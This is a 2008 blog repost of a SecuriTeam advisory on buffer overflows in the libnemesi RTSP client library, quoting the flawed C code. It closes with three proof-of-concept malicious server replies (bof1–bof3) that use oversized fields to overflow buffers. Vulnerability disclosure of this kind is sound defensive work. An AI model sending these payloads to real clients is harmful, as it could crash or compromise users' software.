Search This Blog

Wednesday, January 02, 2008

[UNIX] libnemesi Multiple Vulnerabilities

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html


- - - - - - - - -

libnemesi Multiple Vulnerabilities
------------------------------------------------------------------------


SUMMARY

<http://live.polito.it/documentation/libnemesi> libnemesi is "an open
source client library for implementing the RTSP/RTP streaming playback
easily. The library has been written by the Italian team of the
Politecnico di Torino University for the LScube project". Multiple buffer
overflow vulnerabilities have been discovered in libnemesi.

DETAILS

Vulnerable Systems:
* libnemesi version 0.6.4-rc1 and prior

Immune Systems:
* libnemesi version 0.6.4-rc2

Buffer overflow in handle_rtsp_pkt
handle_rtsp_pkt is the function used for checking the server's reply, it
uses a buffer of 32 bytes called ver for containing the version sent by
the server (like HTTP/1.0) using a sscanf without size limitations.

From rtsp/rtsp_handlers.c:

int handle_rtsp_pkt(rtsp_thread * rtsp_th)
{
char ver[32];
int opcode;
...
if (sscanf((rtsp_th->in_buffer).data, "%s ", ver) < 1) {
...

The same bug exists also in the check_status function located in
rtsp_internals.c but naturally can't be reached since handle_rtsp_pkt is
called (and exploited) for first.

Buffer overflow in the send_*_request functions
The send_*_request functions available in rtsp/rtsp_send.c
(send_pause_request, send_play_request, send_setup_request and
send_teardown_request) are vulnerable to various buffer-overflow
vulnerabilities caused by the usage of buffers initialized using 256 bytes
plus the size of one parameter without considering all the others received
by the server like, for example, Content-Base.

Buffer overflow in get_transport_str_*
Another buffer-overflow vulnerability is available in the
get_transport_str_sctp, get_transport_str_tcp and get_transport_str_udp
functions in which is used strncpy in a wrong way. In fact the size
parameter is not referred to the size of the destination buffer but to the
source one.

From rtsp/rtsp_transport.c:

int get_transport_str_sctp(rtp_session * rtp_sess, char * tkna, char *
tknb) {
char str[256];
uint16_t stream;
do {
if ((tkna = strstrcase(tknb, "server_streams"))) {
for (; (*tkna == ' ') || (*tkna != '='); tkna++);
for (tknb = tkna++; (*tknb == ' ') || (*tknb != '-');
tknb++);

strncpy(str, tkna, tknb - tkna);
...

Exploit:
bof1:
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaa 200

bof2:
RTSP/1.0 200 OK
Cseq: 1
Content-length: 44
Content-Type: application/sdp
Content-Base:
rtsp://localhost/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

m=audio 0 RTP/AVP 96
m=video 0 RTP/AVP 97

bof3:
RTSP/1.0 200 OK
Cseq: 1
Content-length: 44
Content-Type: application/sdp
Content-Base: rtsp://localhost/file.ext

m=audio 0 RTP/AVP 96
m=video 0 RTP/AVP 97
RTSP/1.0 200 OK
Cseq: 2
Session: 2873109947796720585
Transport: RTP/AVP/TCP;interleaved=999_aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaa-


ADDITIONAL INFORMATION

The information has been provided by <mailto:aluigi@autistici.org> Luigi
Auriemma.
The original article can be found at:
<http://aluigi.altervista.org/adv/libnemesibof-adv.txt>

http://aluigi.altervista.org/adv/libnemesibof-adv.txt

========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

No comments: